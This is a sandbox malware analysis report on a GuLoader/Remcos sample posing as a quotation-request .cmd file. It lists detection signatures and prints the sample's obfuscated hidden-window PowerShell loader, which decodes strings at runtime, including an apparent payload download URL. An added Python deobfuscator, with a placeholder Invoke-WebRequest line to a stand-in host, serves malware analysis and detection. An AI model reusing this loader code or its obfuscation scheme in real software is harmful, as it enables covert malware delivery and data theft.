Windows Analysis Report
Teklif talebi BAKVENTA-BAKUUsurpationens.cmd
Overview
General Information
Detection
GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 7448)
  cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Teklif talebi BAKVENTA-BAKUUsurpationens.cmd""
  MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE
  - conhost.exe (PID: 7456)
    cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    MD5: 0D698AF330FD17BEE3BF90011D49251D
  - powershell.exe (PID: 7504)
    cmdline: powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke($Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig ' K njMResao Afstznedsi Festl urlF okuaUnr /h alf5Re,u. Unb0bld T an(PostWFr ekiSpeenGa rddv,cioIn f.wSings H ea BracN R oqTL.at Ba bo1D,mi0Qq .a.Sten0Pr op;Thec De fiWNonciEt agnOpry6Am el4Topc;Ge la HetzxIn dk6Comp4F. rt;Bill Er hvr Denv N .n:.syc1Ba si2sdsu1ge t.Jens0 S pa)Prim Un boGStameSl eec,fskkLo vloMain/ . om2Nulp0Ca rb1F rr0Re or0Offi1.y kk0Ahis1Tf fe TreF Tw oiunwrr Di seSvrdfGat tos,rix Ib r/Poli1Far .2Dump1 As .Enhy0Thu s ';$Nysseliges=Handig ',undU Eges ignes notr Ins-A lbuA,lleg, useeUpstnI soitAnni ';$Fordommes=Handig ' odeh Zigt GacatJ,jup Fl,:.ent/ B gg/ lor8 Aden7Tors. Do.m1Mult2 Und1dy,n. unbr1cute0 Reg5Appl. Mast1 ic6A mb3Dete/F iltTUnexeK onsrwa.smA ut.i rovnS ka.aStocl PatjBipaoT igebD sk.O vertMetaoE kspcRhab ';$Problemanalysernes=Handig 'U ro.>Fe.l ';$Normalprisen=Handig 'Mic.iSk aaeRegex S tr ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSR egoePas.tD ehu- Je C Stio UnsnG eomtUnteeT alln Re.tS pir Stil-B eatPImpra StetplurhS l.g Ko,mT H.b:Part\S p,nK.also, mpir AlysN itre W mtS emisMonr.T .att Ch xs ,nstDisp , fsk-FuglV La,aTipslS karuLa,se Bo lr t$ u scSMisac H ydhR.kei l ooz KigoRe p.pLderhAc icaDisrsAp peiAggra,r ro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr( AaletFacoe TorsDub t indk- Strp MalaaHeavt Ti.eh,ndi H neT Li.: sp l\DemoK AbsooRekor MenisA.foe UnsctUn es .eta.Unibt Bentx Adet A.s)Kvin{ eksae Pasx ,oeci Rent Equa} Fer; trop ');$Wedeln = Handig 'Nonm edemycBede h iewoFor edan%kon.a l,plpFarmp MakedAra a WoodtBisua Raft% Gen\ Ma,ePRiksl TilleSpaau oodrFun.o SenstForbh C.mpoLys,t Tito Ca n Unblu Ma,s Amer.ImprD DistiDi,il Las Gara& Post&Staf C,loeF.toc GennhFango Chi, Tor$O ver ';Xerotherm (Handig 'tore$ mangOthil TriloUnstb Tr,na.aval ove:paabS Opt.w Enge Dir.eLus p AntryT pe= Gaze(S ecc StrmPnhed Udda Fejl/ ,avlcPr t Utl$,agsWT rine,ilbd DydeFly.lT y.inKar.)P lat ');Xerotherm (Handig 'Pr s $BriegStra l ,odoNo,i b ,ndaInte lSu.e:Faco D CleeDo.a b PriaNark tbeeftKont e VaraBram tUds.rCam eIc.nn Sto eUtths Reu =Tall$Plam FAn.no F r rStradc.ib oDisgmNste mIns,eKlar sCali.Pr b sdetepKr,v lReaciSang t Urf(Gill $TeisP Sk. rE spoProm bB tol Dom eCuttmT,ld a.allnRham aJordlopry yPicksWo k eArtsrBox.
    (The obfuscated string literals passed to Handig are shown as the report prints them, with the spaces its column wrapping inserted; the command line is cut off at this point, so no MD5 is given for this process.)
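The powershell.exe command line above carries its own string decoder. Handig assembles the method name Substring from three fragments ('S', 'ubstrin', 'g') so the word never appears literally, then walks its argument with For($Columbaries=4; $Columbaries -lt Length-1; $Columbaries+=(5)) and keeps one character per step via $obj.$Kapsle.Invoke(...). Every literal handed to Handig is therefore four filler characters per payload character, plus one trailing filler that the Length-1 bound skips. Xerotherm then runs & ($Normalprisen) on a decoded string, so decoded text is executed rather than merely stored, which is what the "dynamic code loading" signature is pointing at. The Python below is an added example, not code from the report or from the sample: it recovers the start offset and stride from a loop of that shape, pulls every Handig '...' literal out of a command line and decodes it. Because the literals as printed in the report contain spaces inserted by column wrapping and cannot be decoded as shown, the command line it runs against is constructed here with harmless placeholder payloads; the variable names are borrowed from the report, the values are not the sample's.

```python
"""Stride deobfuscator for a GuLoader-style PowerShell decoder.

Added example: not code from the report or the malware. The decoder shape it
targets is the one visible in the process tree (Substring at offset 4, step 5,
upper bound Length-1); the sample command line below is constructed with
harmless payloads.
"""
import re

# Matches the decoder loop and captures the start offset and the stride:
#   For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5))
STRIDE_LOOP = re.compile(
    r"For\(\$\w+\s*=\s*(\d+);\s*\$\w+\s+-lt\s+\$\w+;\s*\$\w+\s*\+=\s*\(?(\d+)\)?\)",
    re.IGNORECASE,
)

# Constructed filler text used only to build the sample literals.
FILLER = "NabolandenesKapsleFestskriftetsColumbaries"


def loop_params(cmdline):
    """Return (start, stride) of the first stride loop in cmdline, or None."""
    m = STRIDE_LOOP.search(cmdline)
    return (int(m.group(1)), int(m.group(2))) if m else None


def decode(blob, start=4, stride=5):
    """Mirror the PowerShell loop: the bound is Length-1, so the final filler
    character of each literal is never read."""
    return "".join(blob[i] for i in range(start, len(blob) - 1, stride))


def decode_literals(cmdline, decoder="Handig"):
    """Find every `<decoder> '<literal>'` call in cmdline and decode its argument.

    Returns (target, plaintext) pairs; target is the variable the result is
    assigned to, or '<invoked>' when the call is passed straight to another
    function, as in `Xerotherm (Handig '...')`."""
    params = loop_params(cmdline)
    if params is None:
        raise ValueError("no stride decoder loop found in command line")
    start, stride = params
    call = re.compile(
        r"(?:\$(\w+)\s*=\s*)?\(?" + re.escape(decoder) + r"\s+'((?:[^']|'')*)'",
        re.IGNORECASE,
    )
    results = []
    for m in call.finditer(cmdline):
        blob = m.group(2).replace("''", "'")  # PowerShell single-quote escape
        results.append((m.group(1) or "<invoked>", decode(blob, start, stride)))
    return results


def encode(payload, start=4, stride=5):
    """Constructed inverse of decode(), used only to build the sample: `start`
    filler characters, then stride-1 fillers before each further payload
    character, then the trailing character the Length-1 bound skips."""
    out, k = [], 0

    def fill(n):
        nonlocal k
        for _ in range(n):
            out.append(FILLER[k % len(FILLER)])
            k += 1

    fill(start)
    for idx, c in enumerate(payload):
        if idx:
            fill(stride - 1)
        out.append(c)
    out.append(" ")
    return "".join(out).replace("'", "''")


def sample_cmdline():
    """Constructed command line in the shape of the one in the process tree:
    the decoder prologue, then literals assigned to variables or handed straight
    to the invoker. Payloads are placeholders, not the sample's values."""
    prologue = (
        'powershell.exe -windowstyle hidden "$Nabolandenes = 1;'
        "$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';"
        "Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;"
        "For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5))"
        "{$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke($Columbaries, $Nabolandenes);}$Festskriftets;}"
        "function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}"
    )
    body = (
        f"$Palmehavers=Handig '{encode('Mozilla/5.0 (constructed)')}';"
        f"$Nysseliges=Handig '{encode('User-Agent')}';"
        f"$Fordommes=Handig '{encode('http://stage2.example.invalid/payload.bin')}';"
        f"$Normalprisen=Handig '{encode('Write-Output')}';"
        f"Xerotherm (Handig '{encode('Invoke-WebRequest -UseBasicParsing $Fordommes')}');\""
    )
    return prologue + body


if __name__ == "__main__":
    for target, plain in decode_literals(sample_cmdline()):
        print(f"{target:14s} -> {plain}")
```

Against a real command line, pass the decoder's actual function name; the loop is matched on its shape (start value, -lt, +=) rather than on the randomised variable names, which is also what a detection rule has to key on, since neither Substring nor the payload strings appear literally in the script.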